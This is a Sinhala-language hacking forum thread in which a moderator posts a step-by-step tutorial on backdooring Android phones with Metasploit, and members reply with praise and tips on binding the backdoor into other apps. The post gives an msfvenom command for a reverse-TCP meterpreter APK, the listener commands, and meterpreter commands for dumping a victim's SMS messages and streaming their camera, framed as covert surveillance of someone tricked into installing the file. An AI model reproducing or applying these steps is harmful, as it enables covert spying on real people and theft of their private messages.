1. Content Hidden For Guests in a Forum! You Must Register To See The Hidden Data Contained Here! 

    [ SIGN UP NOW! ] [Read Our Forums Rules]
    Dismiss Notice
Dismiss Notice
Do Not Try To Register Using Temp Mail.! We Will Ban Your IP Permanently!
^Spam Killer Staff

Metasploit Android Hacking (1) Basic

Discussion in 'Mobile Device Hacking' started by S.F.C, May 20, 2017.

Leaked forums
  1. S.F.C

    S.F.C Moderator

    Joined:
    May 8, 2017
    Messages:
    63
    Likes Received:
    84
    [​IMG]

    Metasploit ගැන ඔයාල අහල ඇති නොදන්නවනම් මෙතනින් ගිහින් දැනගන්න , අද කියන්න යන්නේ Metasploit වලින් Android devices Hack කරන්නේ කොහොමද කියල දන්න අයත් ඇති නොදන්න අය මේකෙන් දැනුමක් ලබාගනියි කියල හිතනවා . මුලින්ම කියන්න ඕනේ මේක යල් පැනගිය ක්‍රමයක් එත් තවමත් බාවිතා වෙනවා . මේක මන් නිකන් පලකරන පොස්ට් එකක් නෙවේ කරලා බලල අත්දැකීමක් එක්ක පලකරන පොස්ට් එකක් . හරි බලමු මේකෙන් වෙන්නේ මොකක්ද සහ කරන්නේ කොහොමද කියල .
    මේකෙදි සිද්ද වෙන දේ ගැන කිව්වොතින් මේක 100% කම remotly සිද්ද කරන්න බෑ , මේකෙදි අපි metasploit වලින් backdoor එකක් සාදා ගැනීමත් , ඒ backdoor
    apk එක අපේ victim ගේ අතට පත් කරන්නත් ඕනේ , ඊට පස්සේ metasploit වලින් victim ගේ device එකේ පාලනය අපේ අතට ගන්න පුළුවන්
    අපිට victim ගේ messages කියවන්න camera stream කරන්න වගේ වැඩ කරගන්න පුළුවන්
    , මේ පොස්ට් එකෙන් කියන්නේ මේකේ Basic එක ගැන විතරයි මේ දේ Advanced විදිහට කරන්න පුළුවන් උදාහරණයක් විදිහට අපේ Backdoor එක තවත් App එකකට Bind කරන්න පුළුවන් ඒ ගැන ඉදිරියේදී කියන්නම්

    මේක කරන විදිහ පියවර විදිහට කියන්නම් පියවර විදිහට පහතින් code ටික ලබාගන්න

    1) Metasploit මගින් අවශ්‍ය Payload එක Genarate කරගැනීම

    Code:
    msfvenom -p android/meterpreter/reverse_tcp –platform android LHOST= “ඔබේ ip ලිපිනය ” LPORT=444() -o /root/Desktop/backdoor.apk(කැමති path එකක් use කරන්න )
    කලින් මේකට පාවිච්චි කලේ msfpayload කියන main command එක එත් දැන් ඒ වෙනුවට මේ command එක තමයි බාවිතා වෙන්නේ

    2) අපේ victim ගේ අතට මේ Apk file එක පත් කිරිම
    මේක ගැනනම් කියන්න ඕනේ නැහැනේ ඉතින් :)

    3) Exploit කිරීම

    අපි හිතමු අපේ victim මේක install කළා කියල

    දැන් බලමු කොහොමද එයාගේ device එකට access වෙන්නේ කියල
    මුලින් metasploit console එක open කරගන්න
    දැන් මේ code use කරන්න


    Code:
    use multi/handler
    set PAYLOAD android/meterpreter/reverse_tcp
    set LPORT 444 (අපි backdoor එක genarate කරගන්න විට එකට යොදපු පොර්ට් එක )
    set LHOST “ඔබේ ip ලිපිනය ”
    exploit
    හරි දැන් අපේ victim අන්තර්ජාලයට සම්බන්ද වෙලා ඉන්නවනම් අපේ backdoor එක අපේ ip ලිපිනයට හා පොර්ට් එකට සම්බන්ද වෙනවා දැන් අපි හිතමු සැසිය (session)
    එක හැදුන කියලා
    දැන් අපි එයාගේ device එකේ පාලනය අතට අරන් ඉවරයි

    දැන් මේ වගේ code use කරන්න පුළුවන්
    එයා ගේ messages read කරන්නනම්
    Code:
    dump_sms
    වෙබ් cam stream කරන්න
    Code:
    webcam_stream
    මෙතැනදී අපිට victimගේ sms text file එකක් විදිහට ලබාගන්න පුළුවන්
    මේකෙන් තව ගොඩක් දේවල් කරගන්න පුළුවන් මේ තමා මුලික දේවල් ටික තවත් දේවල් ඉදිරියේදී කියන්නම්

    { S.F.C කරුණාකර කතු අයිතිය සුරකින්න }
     
    #1 S.F.C, May 20, 2017
    Last edited by a moderator: May 20, 2017
  2. Khan Coder

    Khan Coder Member

    Joined:
    May 19, 2017
    Messages:
    35
    Likes Received:
    101
    :emoji_heart_eyes: Great Bro!! I Love It :emoji_heart_eyes:
     
    Shadow_Walker and S.F.C like this.
  3. Mr.Lol

    Mr.Lol Active Member

    Joined:
    May 8, 2017
    Messages:
    140
    Likes Received:
    127
    cool bro...kohomada bind karanne?
     
  4. Shadow_Walker

    Shadow_Walker Member

    Joined:
    May 8, 2017
    Messages:
    73
    Likes Received:
    66
    Binding soft ekak use krnlne..
     
  5. Shadow_Walker

    Shadow_Walker Member

    Joined:
    May 8, 2017
    Messages:
    73
    Likes Received:
    66
    Android device එක static ip එකකින් connect වෙලා ඉන්න ඕනේ නේද..නැත්නම් access කරන්න බෑ නේද..normal sim එකකින් යනකොට ඒකේ net connection එක dynamic නේ..
     
  6. Anøn LK

    Anøn LK Administrator

    Joined:
    May 8, 2017
    Messages:
    35
    Likes Received:
    41
    Great bro:)
     
  7. Ha4sh#

    Ha4sh# Newbie

    Joined:
    May 20, 2017
    Messages:
    1
    Likes Received:
    0
  8. S.F.C

    S.F.C Moderator

    Joined:
    May 8, 2017
    Messages:
    63
    Likes Received:
    84
    o
    Ow eka aththa
     
    Shadow_Walker likes this.
  9. S.F.C

    S.F.C Moderator

    Joined:
    May 8, 2017
    Messages:
    63
    Likes Received:
    84
    Perl script walin puluwan nathnam trity kiyla framework ekak thiynwa ekenuth puluwan :)
     
  10. bhgraphic

    bhgraphic Newbie

    Joined:
    May 19, 2018
    Messages:
    5
    Likes Received:
    0
    wooow great it wil work realy?
     

Share This Page